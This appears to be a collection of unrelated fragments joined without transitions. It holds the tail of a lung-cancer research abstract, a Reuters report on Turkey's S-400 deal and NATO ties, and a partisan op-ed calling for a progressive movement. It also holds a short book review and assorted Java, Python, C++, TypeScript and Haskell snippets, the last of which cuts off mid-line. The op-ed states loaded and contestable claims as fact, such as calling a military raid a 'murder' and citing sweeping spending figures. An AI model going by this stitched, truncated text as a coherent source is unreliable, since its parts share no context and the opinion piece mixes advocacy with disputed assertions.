These transcription factors can promote overexpression of anti-apoptosis genes such as Bcl-xL and cell-cycle genes such as c-Myc and cyclin D1, and induce abnormal growth of tumor cells. In summary, malignant transformation of BEAS-2B cells induced by CTPE can serve as an excellent in vitro model for studying lung cancer pathogenesis. Tumor-promoting inflammation represents a critical step in lung carcinogenesis: chronic and smoldering inflammation induced by tumor-associated macrophages may precede tumor initiation, creating a favorable microenvironment in which cells with cancer-causing mutations thrive. NF-κB activation, as one of the pillars of inflammation, may have a promoting role in the occurrence of lung cancer. A better understanding of the molecular mechanisms at the early stage of lung carcinogenesis would provide useful information for establishing novel preventive and therapeutic strategies for people at high risk of lung cancer and for lung cancer patients.
ABOARD THE TCG ALEMDAR (Reuters) - In blazing sunlight, two dozen U.S. and Turkish sailors on a NATO exercise lower an American diving bell from an advanced Turkish rescue ship, sending it deep under the Aegean Sea where it is secured to a submarine. U.S. and Turkish sailors prepare a U.S. Navy Submarine Rescue Chamber to dive on board the Turkish Navy's submarine rescue mother ship TCG Alemdar during the Dynamic Monarch-17, a NATO-sponsored submarine escape and rescue exercise, off the Turkish Naval base of Aksaz, Turkey, September 20, 2017. Picture taken September 20, 2017. REUTERS/Murad Sezer Part of a combined NATO rescue simulation this week off Turkey’s southwest coast, the seamless cooperation at sea comes amidst a storm between Ankara and its alliance allies who are concerned about its decades-old commitment to the organization. Under President Tayyip Erdogan, Turkey, with NATO’s second-biggest army, has sought to bolster ties with Russia and Iran. In a clear sign of rapprochement, Ankara is buying a missile defense system from Russia - unnerving NATO officials, who are already wary of Moscow’s military presence in the Middle East, as the system is incompatible with the alliance’s systems. Turkey said it opted for the S-400 anti-aircraft system because Western arms suppliers had not offered a “financially effective” alternative. The Pentagon said it expressed concern to Turkey about the deal. “They went crazy because we made the S-400 agreement. What were we supposed to do, wait for (them)?” Erdogan said recently. “If we have difficulty in obtaining any defense element from some places, if our initiatives are often frustrated by obstacles, what will we do? We will sort it out on our own.” Erdogan’s frustration stems from Washington’s support for the Syrian Kurdish YPG in the fight against Islamic State. 
Ankara sees the YPG as an extension of the outlawed Kurdistan Workers Party (PKK), which has carried out an insurgency in Turkey’s largely Kurdish southeast and is considered a terrorist organization by the United States and Europe as well as Turkey. ANGERED BY INDICTMENT The president was also angry that U.S. prosecutors charged his former economy minister for conspiring to violate U.S. sanctions on Iran. The indictment marked the first time an ex-government member with close ties to Erdogan had been charged in the investigation that has strained relations between Washington and Ankara. “Part of the reason Erdogan is doing this S-400 deal is he’s angry with the U.S. over the indictment of the former economy minister as well as continued U.S. cooperation with the YPG,” said Soner Cagaptay, a fellow at the Washington Institute think-tank and author of “The New Sultan: Erdogan and the Crisis of Modern Turkey”. “He’s using the S-400 as a lever, in terms of bargaining, to convince Washington to change its mind on a number of issues.” Ties with Europe, especially Germany, were hit by Turkey’s crackdown after last year’s failed coup. Some 150,000 people were purged from the civil service, military and private sector and over 50,000 jailed, including German nationals. Alarmed by what it sees as Ankara’s deteriorating record on human rights, Germany has said it would restrict some arms sales to Turkey. It initially announced a freeze on major arms sales, but scaled that back, citing the fight against Islamic State. Ankara also refused to allow German lawmakers to visit their troops stationed at an air base in Turkey. This has led Germany to move troops involved in the campaign against Islamic State from Turkey’s Incirlik base to Jordan. NOT AN ALTERNATIVE Turkey rejects the idea it is turning away from the West. 
“The good relations Turkey has developed with Russia are not an alternative to the good relations it has with the West, they complement each other,” Erdogan spokesman Ibrahim Kalin said. Erdogan told Reuters in an interview on Thursday that Turkey’s position in NATO had not been weakened by the deal. Still, some fear Turkey might eventually find itself at the periphery of the alliance. “Germany is our most important supplier of weapons after the United States,” said Umit Pamir, a former Turkish diplomat. He said the suspension of arms sales would “surely impact our defense systems”. Erdogan has been on a push to improve ties with Moscow after Turkey’s economy, particularly its tourism industry, was shaken by sanctions imposed by Russia after Turkey shot down one of its warplanes over Syria in late 2015. He is due to meet Russian President Vladimir Putin next week to discuss a plan agreed by their countries and Iran to reduce the fighting in Syria’s northwestern Idlib province. DIFFERENT SIDES IN SYRIA Turkey supports rebels against Syrian President Bashar al-Assad, who is backed by Russia and Iran. Erdogan plans to visit Iran next month. The two countries agreed in August to boost military cooperation when Iran’s military chief, General Mohammad Baqeri, met Erdogan during a visit. The trip was the first by an Iranian military chief of staff to Turkey since the 1979 Islamic revolution in Iran. While they back opposite sides in Syria, Ankara and Tehran have found some common ground in their opposition to the Kurdish independence referendum in Iraq. Both countries fear that an independent Kurdish state could inflame separatist tensions with their Kurdish minorities. Recent discord over the S-400 purchase did not signal a drastic break from NATO for Turkey, said Mustafa Kibaroglu, a professor of international relations at Turkey’s MEF University. He said the West had over-reacted to the purchase.
“I don’t think there is any debate about Turkey leaving an alliance it has invested so much in,” Kibaroglu said. “Are we going to bring down U.S. planes with our S-400s?” he said. “There is no backbone to these comments, it is purely political polemics, and we are not the ones doing this.”
package fr.cookiedev.codebreaker.core.questions.impl;

import fr.cookiedev.codebreaker.core.Code;
import fr.cookiedev.codebreaker.core.Tile;
import fr.cookiedev.codebreaker.core.Tile.Color;
import fr.cookiedev.codebreaker.core.questions.Question;

public class BlackSumQuestionImpl implements Question {

    @Override
    public String answer(Code code) {
        // Sum the values of all black tiles in the code.
        int sum = 0;
        for (final Tile tile : code.getTiles()) {
            if (tile.getColor() == Color.BLACK) {
                sum += tile.getValue();
            }
        }
        return Integer.toString(sum);
    }
}
def additional_pixel_clock(self):
    # Drop the two low-order bits of byte 12; the remaining upper six
    # bits count steps of 0.25.
    return (self._block[12] >> 2) * 0.25
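The one-liner above packs two operations: a right shift that discards the two low-order bits of the byte, and a scale by 0.25. A minimal standalone sketch of the same arithmetic (the free-function name and sample byte are illustrative, not from the source):

```python
def decode_additional_pixel_clock(raw_byte):
    # Drop the low two bits; the remaining upper six bits count steps of 0.25.
    return (raw_byte >> 2) * 0.25

# 0b00101001 >> 2 == 0b1010 == 10, and 10 * 0.25 == 2.5
print(decode_additional_pixel_clock(0b00101001))
```

Because the shift happens before the multiply, the two discarded bits never contribute: any raw byte from 0b00101000 through 0b00101011 decodes to the same 2.5.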
/**
 Copyright (c) 2015-present, Facebook, Inc.
 All rights reserved.

 This source code is licensed under the BSD-style license found in the
 LICENSE file in the root directory of this source tree.
 */

#ifndef __xcsdk_SDK_Manager_h
#define __xcsdk_SDK_Manager_h

#include <xcsdk/SDK/Platform.h>
#include <xcsdk/SDK/Toolchain.h>
#include <xcsdk/SDK/Target.h>
#include <libutil/Filesystem.h>

#include <memory>
#include <string>
#include <ext/optional>

namespace libutil { class Filesystem; }
namespace xcsdk { class Configuration; }

namespace xcsdk {
namespace SDK {

/*
 * Represents the contents of a developer root, containing toolchains,
 * platforms, and SDKs. There is usually only one developer root.
 */
class Manager {
private:
    std::string _path;
    std::vector<Platform::shared_ptr> _platforms;
    std::vector<Toolchain::shared_ptr> _toolchains;

public:
    Manager();
    ~Manager();

public:
    /*
     * Platforms included in the developer root.
     */
    inline std::vector<Platform::shared_ptr> const &platforms() const
    { return _platforms; }

    /*
     * Toolchains included in the developer root.
     */
    inline std::vector<Toolchain::shared_ptr> const &toolchains() const
    { return _toolchains; }

public:
    /*
     * The path to the developer root.
     */
    inline std::string const &path() const
    { return _path; }

public:
    /*
     * Find an SDK by name. This does a fuzzy search, so the "name" could
     * be an SDK name or path, or even the name of a platform.
     * The provided filesystem will attempt to resolve the name if the name is
     * a symlinked path.
     */
    Target::shared_ptr findTarget(libutil::Filesystem const *filesystem, std::string const &name) const;

    /*
     * Find a toolchain by name. This does a fuzzy search; the "name" could
     * be a name, path, or identifier for the toolchain.
     * The provided filesystem will attempt to resolve the name if the name is
     * a symlinked path.
     */
    Toolchain::shared_ptr findToolchain(libutil::Filesystem const *filesystem, std::string const &name) const;

public:
    /*
     * Finds all platforms in a platform family.
     */
    std::vector<Platform::shared_ptr> findPlatformFamily(std::string const &identifier);

public:
    /*
     * Default settings for the contents of the developer root.
     */
    pbxsetting::Level computedSettings() const;

public:
    /*
     * Standard executable paths for tools found directly in the developer
     * root, rather than within a toolchain or a platform.
     */
    std::vector<std::string> executablePaths() const;

    /*
     * Conglomeration of executable paths that optionally includes extra toolchains
     * and the paths from an SDK target.
     */
    std::vector<std::string> executablePaths(
        Platform::shared_ptr const &platform,
        Target::shared_ptr const &target,
        std::vector<Toolchain::shared_ptr> const &toolchains) const;

public:
    /*
     * Load from a developer root. Returns nullptr on error.
     */
    static std::shared_ptr<Manager> Open(libutil::Filesystem const *filesystem, std::string const &path, ext::optional<Configuration> const &configuration);
};

}
}

#endif // !__xcsdk_SDK_Manager_h
def loadUserConfig(self):
    """Load the user's config and picture from remote dotfiles."""
    configFile = '.config'
    pictureFile = '.picture'
    userConfig = self.viewRemoteFile(configFile)
    pictureConfig = str(self.viewRemoteFile(pictureFile))

    userConfigData = {}
    userConfigData['picture'] = pictureConfig
    # Each line of the config file is a "key:value" pair.
    for i in userConfig.strip().split("\n"):
        k, v = i.split(':')
        userConfigData[k] = v
    return userConfigData
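The parsing step of `loadUserConfig` can be exercised in isolation. This sketch mirrors the same split logic with an inline string standing in for the remote file (the function name and sample data are illustrative); note it splits only on the first colon, a small robustness tweak over the original `i.split(':')`, which raises `ValueError` whenever a value itself contains a colon:

```python
def parse_user_config(raw_config, picture):
    """Mirror of loadUserConfig's parsing: one 'key:value' pair per line."""
    data = {'picture': str(picture)}
    for line in raw_config.strip().split("\n"):
        k, v = line.split(':', 1)  # split on the first colon only
        data[k] = v
    return data

sample = "name:alice\nserver:host:8080"
print(parse_user_config(sample, "avatar.png"))
```

With `maxsplit=1`, the `server` entry keeps its full `host:8080` value instead of crashing the loop.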
We can all agree that President Donald Trump is a disaster for the country. He has been proving this pretty much every day since his inauguration. But Democrats and progressive activists need to do more than decry Trump’s horrific actions, from his ban on immigrants, including refugees, from seven majority-Muslim countries, to his murder of an eight-year-old American girl in a Special Forces raid in Yemen, his order to the US Army Corps of Engineers to approve a permit for the completion of a pipeline upstream of the Standing Rock Sioux reservation, and his nomination of Judge Neil Gorsuch, an Antonin Scalia clone, to fill the late Scalia’s seat on the Supreme Court. Blocking or at least opposing bad executive orders, laws and nominations is of course important, but in a situation where the Republican Party is in solid control of both houses of Congress, it is also futile, and thus only symbolic. Democrats lost control of Congress in 2010, and lost the White House last November, because they were not offering American voters a real progressive alternative. For decades now, the party and its elected officials in Washington have been DINOs (Democrats in Name Only). Corporatists as much as their Republican opponents, they have been posing as something different by playing to their base with things like support for gay marriage, support for the unenforceable and purely aspirational Paris Climate Agreement, and support for…um, well, it’s actually a pretty short list when you think about what Democrats have been for lately that really rates as progressive. Recall that when President Obama came into office, with a solid Democratic majority in both houses of Congress, he came off a campaign in which he had vowed to restore open constitutional government, to make it easier for unions to organize, to end the wars in Iraq and Afghanistan, and to kickstart the recession-mired economy with a burst of major deficit spending.
He did none of that, and the Democratic Congress did none of it for him either. Obama and the Democrats paid for their lack of decisive progressive action by losing Congress two years later and it’s been downhill ever since. Now they’ve lost the White House too. Unless that party wakes up and realizes that it needs a wholesale makeover, in the form of a return to its New Deal roots, it will lose the Congressional elections in 2018, and it will lose the presidential race in 2020, along with even more state governorships and statehouses (currently 32 of the 50 states are wholly in Republican hands). People have said that third parties have no chance in the US, but the Democratic Party seems hell-bent on proving them wrong by becoming a “third party” on its own, but in a one-party system with the Republicans being the last major party standing. At the rate things are going, we could end up with the next presidential election featuring a Republican nominee, whether Trump or someone else, debating himself because the Democratic nominee won’t make the 15% polling cut-off to be eligible to participate! Most Americans have a pretty low opinion of both parties these days, and are registered as independents for a reason. Republicans, including Trump, were elected largely as a protest vote against eight years of do-nothing Democrats, and the Democratic party is so ossified that it’s unlikely that its leadership, the Democratic National Committee, can be changed, especially in time for the congressional elections of 2018, when we’re likely to see the same lame corporatist candidates running for re-election. This means it’s up to us, the progressive majority in America, to organize a movement outside the Democratic Party, built around those demands that could and would create a powerful force for change. I see four big issues such a movement could be built around: work and retirement security, health care, climate change, and peace and military spending. 
The demands can be quite simple: Fair Pay and Retirement Security for Everyone! Anyone who works at a full-time job should earn enough to support a family. That means we need a federal minimum wage — now! — of $15 per hour, with an annual adjustment for inflation. Workers should be able to have union representation on their job if a majority of workers at a company sign cards saying they want one. Period. And Social Security should pay benefits that are high enough that retired people can live decently on those benefits, since it is clear that companies are no longer offering pensions and nobody but the wealthy earns enough to save any significant amount for retirement. Medicare for All! When Obama announced his plan for the complicated and in the end far too costly and ironically named Affordable Care Act, he lied to Congress and the American people, saying that while other countries might have socialized medical systems that are cheaper and work well, “We in America have no experience with such systems,” and so we would reform the system “our own way.” In fact, as the president well knew, the US has long experience running both a Canadian-style “single-payer” system, where the government is the insurer and bargains to set the prices charged for doctors, hospital treatment and drugs (our system is called Medicare, but you have to be 65 in order to qualify for it), and a British-style system of National Health, where doctors work on salary for the government and hospitals are owned by the government (we call it the Veterans Hospital System, only you have to be a veteran in order to get care, and even then the government makes it hard to meet eligibility requirements for treatment). Combat Climate Change! Most people are aware that the earth’s climate is changing rapidly.
Farmers in the Midwest and Southwest are keenly aware that things are getting hotter and drier, fishermen along the northeast coast know that all the fish are moving northward as warmer seas ruin their habitat, Floridians near the coast can no longer buy new home insurance policies because the insurers see such policies as guaranteed losses they don’t want to face as sea levels rise dramatically, and Alaskans watch tall stands of pine that stretch to the horizon suddenly become “drunken forests” as the trees, growing atop ancient permafrost, suddenly have that solid ground beneath them melt away, leaving them balancing in mud in which their roots can no longer hold them erect. It’s clear to any sentient American with a high-school understanding of science that the climate is out of kilter and that worse is coming unless drastic measures are taken to reduce the pumping of more carbon into the air. And those measures must start immediately. Slash US Military Spending and Bring All the Troops Home! The US military accounts for $1.3 trillion, or 57% of all discretionary spending. This is a figure that is generally hidden from the public by adding into the budget the mandated outlays for Social Security benefits and Medicare. But this is misleading, because those programs, unlike the military, are funded by separate payroll taxes, not by general taxation. Furthermore, unlike Social Security and Medicare, which are mandated benefits, military spending is wholly determined each year by Congress, based upon policies set by the government. And those policies are nuts! No other country in the world spends that much money, either in actual dollars, or as a percentage of its national budget, trying to dominate the entire world.
According to the International Institute for Strategic Studies [1], in 2015 the US spent more than four times what China, with the second biggest military budget, spent (and remember that China’s military is mostly used for domestic control, given that the country is still a dictatorship), and almost nine times what our supposedly “existential enemy” Russia spent (Russia that year budgeted less for its military than did Britain!). Clearly the outrageous US military, with its endless wars, its navy armadas on patrol in every ocean and its over 1,000 bases around the globe, is bankrupting the US and by itself explains the increasingly third-world status of the US in terms of education, infrastructure, transportation and quality of life. The US military must be cut down to size and refocused on what it is supposed to do: defend America, not control the world. Building a movement around these four big over-arching issues, through mass demonstrations and local organizing in churches, community and social organizations, unions, and among friends and neighbors, will either force the nearly moribund Democratic Party to refocus and revitalize itself or will lead to the establishment of a new party on the left to take its place. The model should be the civil rights movement of the 1950s and 1960s, and the anti-war movement of the 1960s and 1970s. Neither of these movements was tied to the Democratic Party, but both forced the Democratic Party — and even to some extent the Republican Party — to come to them and accommodate their demands. Building a left progressive political alternative in the US is doomed to failure if the focus is on the specific demands of “identity” groups, as important as those issues — like gay rights, abortion rights, affirmative action, or immigration reform — may be. It’s not that such issues should be ignored — they should not be — but taken as a whole, they are not unifying demands around which to build a movement.
We need to focus on big demands and big issues that benefit all but the ruling elites and that will fundamentally change the way the country operates. The rest of the changes that are needed will surely follow. The author, arrested and jailed for occupying the Pentagon mall in October ’67, was a war resister and foot-soldier in the anti-war movement of the 1960s and 1970s.
package com.example.jigar.booyahproject.rest.model.response;

import com.google.gson.annotations.SerializedName;

import java.io.Serializable;
import java.util.ArrayList;
import java.util.List;

/**
 * Returned in the body of GET requests for existing Booyah! ratings.
 */
public class RatingsResponse implements Serializable {

    @SerializedName("seconds")
    public List<Integer> seconds;

    @SerializedName("user")
    public int user;

    @SerializedName("media")
    public int media;

    public RatingsResponse(int user, int media) {
        this(new ArrayList<Integer>(), user, media);
    }

    public RatingsResponse(List<Integer> seconds, int user, int media) {
        this.seconds = seconds;
        this.user = user;
        this.media = media;
    }
}
def _process_ingest(self, ingest, file_path, file_size):
    if ingest.status not in ['TRANSFERRING', 'TRANSFERRED']:
        raise Exception('Invalid ingest status: %s' % ingest.status)
    ingest.file_path = file_path
    ingest.file_size = file_size
    if ingest.is_there_rule_match(self._file_handler, self._workspaces):
        ingest.save()
        Ingest.objects.start_ingest_tasks([ingest], strike_id=self.strike_id)
    else:
        # No ingest rule matched this file, so park it as deferred.
        ingest.status = 'DEFERRED'
        ingest.save()
/**
 * Created by Haotao_Fujie on 2016/11/9.
 */
public class ActivityBean {
    public MallActivity activity;

    public class MallActivity {
        public String image;
        public String desc;
        public String uri;
    }
}
/**
 * Provides static utility methods for translating properties between Java and SQL.
 */
public final class PersistenceHelper {
    private PersistenceHelper() {}

    /**
     * Returns the name of the table associated with class {@code c}.
     * Table name defaults to the name of the class, but may be customized with the {@link Table} annotation.
     * @param c class to get table name for
     * @return name of table matching {@code c}
     * @see Table
     */
    public static String getName(Class<?> c) {
        Table override = c.getAnnotation(Table.class);
        if (override != null && override.value().length() <= 0)
            throw new IllegalArgumentException(c + " has a Table annotation with an empty name");

        return (override == null) ? c.getSimpleName() : override.value();
    }

    /**
     * Returns the name of the column associated with field {@code f}.
     * Column name defaults to the name of the field, but may be customized with the {@link Column} annotation.
     * @param f field to get column name for
     * @return name of column matching {@code f}
     * @see Column
     */
    public static String getName(Field f) {
        Column override = f.getAnnotation(Column.class);
        if (override != null && override.value().length() <= 0)
            throw new IllegalArgumentException(f + " has a Column annotation with an empty name");

        return (override == null) ? f.getName() : override.value();
    }

    /**
     * Returns the name of the table associated with field {@code f}.
     * This is meant for special cases where a field requires its own table instead of a column on the declaring class's table.
     * Table name is defined as {@code {DECLARING_CLASS_NAME}_{FIELD_NAME}}
     * @param f field to get table name for
     * @return name of table matching {@code f}
     */
    public static String getFieldTableName(Field f) {
        return getName(f.getDeclaringClass()) + "_" + getName(f);
    }

    /** @return all declared fields in {@code c} matching the requirements of {@link #isPersistable(Field)} */
    public static Stream<Field> getPersistableFields(Class<?> c) {
        return Arrays.stream(c.getDeclaredFields())
                .filter(PersistenceHelper::isPersistable);
    }

    /**
     * Checks whether {@code f} is a "persistable" field.
     * A field is deemed persistable if it is
     * <pre>
     * - Not static
     * - Not transient
     * - Not {@link Transient}
     * - Not synthetic
     * </pre>
     * @param f field to test
     * @return whether {@code f} is a persistable field
     */
    public static boolean isPersistable(Field f) {
        int modifiers = f.getModifiers();
        return !Modifier.isStatic(modifiers)
                && !Modifier.isTransient(modifiers)
                && f.getAnnotation(Transient.class) == null
                && !f.isSynthetic();
    }
}
/***
 * Insert Data Into Mongo With Partitions
 *
 * Takes a set of KeySpacePartition objects and a ThreadPoolExecutor and starts a thread on each partition to migrate
 * data from CouchDB to MongoDB in that range
 *
 * @param executor A ThreadPoolExecutor object containing all the threads to run the migration on
 * @param mongo A Mongo object representing a MongoDB client
 * @param couchDB An ektorp CouchDbConnector object representing a CouchDB client
 * @param partitionMap A SortedMap<String, KeySpacePartition> representing a map of min key to KeySpacePartition objects
 */
private void migrateInBatches(ThreadPoolExecutor executor, Mongo mongo, CouchDbConnector couchDB,
        SortedMap<String, KeySpacePartition> partitionMap) {
    logger.info("Migrating data in batches based on partitions...");
    for (Map.Entry<String, KeySpacePartition> entry : partitionMap.entrySet()) {
        KeySpacePartition partition = entry.getValue();
        logger.info(String.format("Creating migration batch for key range (%s,%s)",
                partition.getMinKey(), partition.getMaxKey()));
        executor.submit(() -> {
            try {
                long id = Thread.currentThread().getId() % numThreads;
                logger.debug(String.format("Starting thread with id %d", id));
                int count = 0;
                // Retry the fetch-and-migrate step up to MAX_NUM_READ_ATTEMPTS times,
                // backing off for 30 seconds after each failure.
                while (count++ < MAX_NUM_READ_ATTEMPTS) {
                    try {
                        fetchFromCouchDBAndMigrate(partition.getMinKey(), partition.getMaxKey(), couchDB, mongo);
                        count = MAX_NUM_READ_ATTEMPTS; // success: exit the retry loop
                    } catch (Exception ex) {
                        logger.error(String.format("[%d] fetchFromCouchDBAndMigrate: ", id) + ex);
                        sleep(30000);
                    }
                }
                logger.debug(String.format("Thread %d finished ", id));
            } finally {
                numProcessed.addAndGet(1);
            }
        });
        // Throttle submission so the executor queue never grows far beyond the thread count.
        while (executor.getQueue().size() > numThreads) {
            logger.debug(String.format("thread has %d jobs in queue, throttling", executor.getQueue().size()));
            try {
                Thread.sleep(5000);
            } catch (InterruptedException ex) {
                logger.error("Encountered an exception when attempting to sleep: " + ex);
            }
        }
    }
}
Book Review: IV. Ministry Studies: Enlarge Your World. The Sunday School Division of the Texas Baptist Convention has put together a good survey of religious education as it is expressed by Southern Baptists. The different authors include seminary professors, denominational leaders, and practitioners in the local church. Part One explores the foundations of religious education. Part Two gives an analysis of the educational programs in a local church. Part Three describes seven vocational roles in religious education.
/** * @author Created By YangKai On 2019/12/26 */ @Service @Slf4j public class MessageService { public Mono<String> parseMessageBody(String messageBody) { return Mono.just(messageBody).map(m -> { Map<String, String> messageMap = new HashMap<>(0); SAXReader reader = new SAXReader(); try { Document document = reader.read(new ByteArrayInputStream(m.getBytes(StandardCharsets.UTF_8))); Element root = document.getRootElement(); List<Element> elementList = root.elements(); elementList.forEach(e -> messageMap.put(e.getName(), e.getStringValue())); } catch (DocumentException e) { log.error("Failed to parse message body", e); } return returnMsg(messageMap); }).doOnError(e -> log.error("parseMessageBody failed", e)); } private String returnMsg(Map<String, String> msg){ log.info(msg.toString()); Document document = DocumentHelper.createDocument(); Element root = document.addElement("xml"); Element toUserName = root.addElement("ToUserName"); Element fromUserName = root.addElement("FromUserName"); Element createTime = root.addElement("CreateTime"); Element msgType = root.addElement("MsgType"); Element content = root.addElement("Content"); toUserName.addCDATA(msg.get("FromUserName")); fromUserName.addCDATA(msg.get("ToUserName")); createTime.addText(String.valueOf(LocalDateTime.now().toInstant(ZoneOffset.of("+8")).toEpochMilli())); msgType.addCDATA("text"); content.addCDATA("hello"); return root.asXML(); } }
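Stripped of the XML plumbing, `returnMsg` above is an echo reply: swap sender and receiver, answer as a text message. A sketch of just that field mapping (CreateTime is omitted here; field names follow the WeChat-style XML above):

```python
def reply_fields(msg):
    # Swap ToUserName/FromUserName as returnMsg does, reply with a text "hello"
    return {
        "ToUserName": msg["FromUserName"],
        "FromUserName": msg["ToUserName"],
        "MsgType": "text",
        "Content": "hello",
    }

print(reply_fields({"ToUserName": "server", "FromUserName": "user"}))
```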
/** * Checks if a given classifier supports the desired capability. * * @author Ingo Mierswa */ public class WekaLearnerCapabilities { public static boolean supportsCapability(Classifier classifier, OperatorCapability lc) { if (!(classifier instanceof SerializedClassifier)) { Capabilities capabilities = classifier.getCapabilities(); if (lc == OperatorCapability.POLYNOMINAL_ATTRIBUTES) { return capabilities.handles(Capabilities.Capability.NOMINAL_ATTRIBUTES); } else if (lc == OperatorCapability.BINOMINAL_ATTRIBUTES) { return capabilities.handles(Capabilities.Capability.BINARY_ATTRIBUTES); } else if (lc == OperatorCapability.NUMERICAL_ATTRIBUTES) { return capabilities.handles(Capabilities.Capability.NUMERIC_ATTRIBUTES); } else if (lc == OperatorCapability.POLYNOMINAL_LABEL) { return capabilities.handles(Capabilities.Capability.NOMINAL_CLASS); } else if (lc == OperatorCapability.BINOMINAL_LABEL) { return capabilities.handles(Capabilities.Capability.BINARY_CLASS); } else if (lc == OperatorCapability.NUMERICAL_LABEL) { return capabilities.handles(Capabilities.Capability.NUMERIC_CLASS); } else if (lc == OperatorCapability.UPDATABLE) { return (classifier instanceof UpdateableClassifier); } else if (lc == OperatorCapability.WEIGHTED_EXAMPLES) { return (classifier instanceof WeightedInstancesHandler); } } return false; } }
// src/features/result/Result.tsx
import React, { FC, useEffect } from 'react'; import { useDispatch, useSelector } from 'react-redux'; import result, { ResultState } from './resultSlice'; import { RootState } from '../../app/rootReducer'; import ResultSection from './ResultSection'; import AllLoveTypesSection from './AllLoveTypesSection'; import Loading from '../../components/Loading'; const Result: FC<{}> = () => { const dispatch = useDispatch(); const { loveType, allLoveTypes, isLoading } = useSelector< RootState, ResultState >(state => state.result); useEffect(() => { dispatch(result.actions.fetchResult()); dispatch(result.actions.fetchAllLoveTypes()); }, [dispatch]); const section = isLoading ? ( <Loading /> ) : ( <div> {loveType && <ResultSection loveType={loveType} />} <AllLoveTypesSection loveTypes={allLoveTypes} /> </div> ); return <div>{section}</div>; }; export default Result;
-- repo: zwizwa/asm_tools
{- Loop transformation algebra This is a mini-language used to illustrate loop transformations, stripped from all non-essentials such as primitive operations and loop/grid sizes. These can then be lifted to languages with more annotation. These are the (bi-directional) operations in the notation developed in rtl.txt, presented in the direction that is most common (i.e. is actually an optimization). - FUSE i: Bi <- Ai i: Ci <- Bi => i: Bi <- Ai Ci <- Bi - ELIMINATE: i: Ci <- Ai Bi Di <- Ci Ci => i: C <- Ai Bi Di <- C C - HOIST i: C <- A B Ei <- C Di => C <- A B i: Ei <- C Di - INTERCHANGE i: j: Cij <- Aij Bij => j: i: Cij <- Aij Bij -} {-# LANGUAGE DeriveFunctor #-} {-# LANGUAGE DeriveTraversable #-} {-# LANGUAGE GeneralizedNewtypeDeriving #-} --{-# LANGUAGE DeriveAnyClass #-} {-# LANGUAGE FlexibleContexts #-} {-# LANGUAGE FlexibleInstances #-} {-# LANGUAGE UndecidableInstances #-} {-# LANGUAGE ScopedTypeVariables #-} {-# OPTIONS_GHC -Werror -fwarn-incomplete-patterns #-} module Language.Grid.LTA where import Data.Functor.Identity import Data.Foldable import Data.Maybe import Data.Char import Control.Monad.Writer import Control.Monad.Reader import Control.Monad.State import Control.Monad.Fail -- The central data type: nested loops of ANF / SSA sections. type Form' = Form Let' -- The representation is split into container.. -- b is binding type data Form b = LetPrim b | LetLoop Index [Form b] deriving (Functor, Foldable, Traversable) -- .. and contained type, which itself is split into a container of -- cell references. -- Fixme: binding and reference are not the same type Opcode = String -- i is grid index type data Let i = Let (DefCell i) String [RefCell i] | Ret [RefCell i] deriving (Functor, Foldable, Traversable) type Let' = Let Index -- .. and a cell type. This I found tricky to derive: it links the -- Grid entity (e.g. grid name), to the index variable type, and the -- type of transformation performed on the index. 
data Cell t i = Cell Grid [t i] deriving (Functor, Foldable, Traversable) type DefCell = Cell Def type RefCell = Cell Ref -- A definition always uses unadulterated index variables. I.e. you -- can't just arbitrarily write into an array. Note that this is just -- the Identity functor with some printing attached to it. data Def t = Def t deriving (Functor, Foldable, Traversable) -- Distinguish the variable from the index operation (derived from -- variable). data Index = Index Int deriving Eq type Ref' = Ref Index data Ref i = Ref i | BackRef i -- Backwards reference for accumulators deriving (Functor, Foldable, Traversable) -- Note that only delay=1 accumulators are supported, but the code is -- structured to later add full triangle coverage. data Grid = Grid Int deriving Eq -- This makes it all fit in a convenient type class hierarchy, which -- simplifies substitution and analysis code. -- For convenience, add a wrapper to bundle a complete collection -- of forms into a program. data Program b = Program [Form b] deriving (Functor, Foldable, Traversable) -- The generalized fold associated to the data type. Note that this -- is not the same as Foldable, which uses the list-like structure in -- the Functor. The generalized fold maps constructors to functions. -- The type is a composition of two types: the prim/loop distinction -- and use of [] to represent a sequence of bindings. Implement -- generalized folds for both components separately. 
-- The first fold is primitive and thus needs destructuring foldForm :: ([Form b] -> a') -- foldList -> (b -> a) -- letPrim -> (Index -> a' -> a) -- letLoop -> (Form b -> a) foldForm foldList letPrim letLoop = form where form (LetPrim p) = letPrim p form (LetLoop i fs) = letLoop i $ foldList fs -- The second fold is a modified list foldr foldFormList :: (Form b -> a') -- foldForm -> (a' -> a -> a) -- cons -> a -- nil -> [Form b] -> a foldFormList foldForm cons = foldr cons' where cons' h = cons (foldForm h) -- These then combine through mutual recursion. foldProgram letPrim letLoop cons nil (Program p) = foldFL p where foldFL = foldFormList foldF cons nil foldF = foldForm foldFL letPrim letLoop -- A Show instance to produce the notation used in the comments above. instance ShowP b => Show (Program b) where show p = showp 0 p instance Show c => Show (Let c) where show p = showp 0 p instance ShowP (Form b) => Show (Form b) where show p = showp 0 p instance (Show t, Show c) => ShowP (t, Let c) where showp _ p = show p class ShowP t where showp :: Int -> t -> String tabs 0 = "" tabs n = " " ++ (tabs $ n-1) instance Show (t i) => Show (Cell t i) where show (Cell a is) = show a ++ (concat $ map show is) instance Show Index where show (Index i) = [chr (ord 'i' + i)] instance Show Grid where show (Grid n) = [chr (ord 'A' + n)] instance Show i => Show (Ref i) where show (Ref v) = show v show (BackRef v) = show v ++ "'" instance Show i => Show (Def i) where show (Def v) = show v instance ShowP b => ShowP (Form b) where showp n (LetLoop i p) = tabs n ++ show i ++ ":\n" ++ showp (n+1) (Program p) showp n (LetPrim b) = tabs n ++ showp n b ++ "\n" instance Show c => ShowP (Let c) where showp n (Ret cs) = "ret" ++ showArgs cs showp n (Let c opc cs) = show c ++ " <- " ++ opc ++ showArgs cs showArgs cs = concat $ map ((" " ++) . 
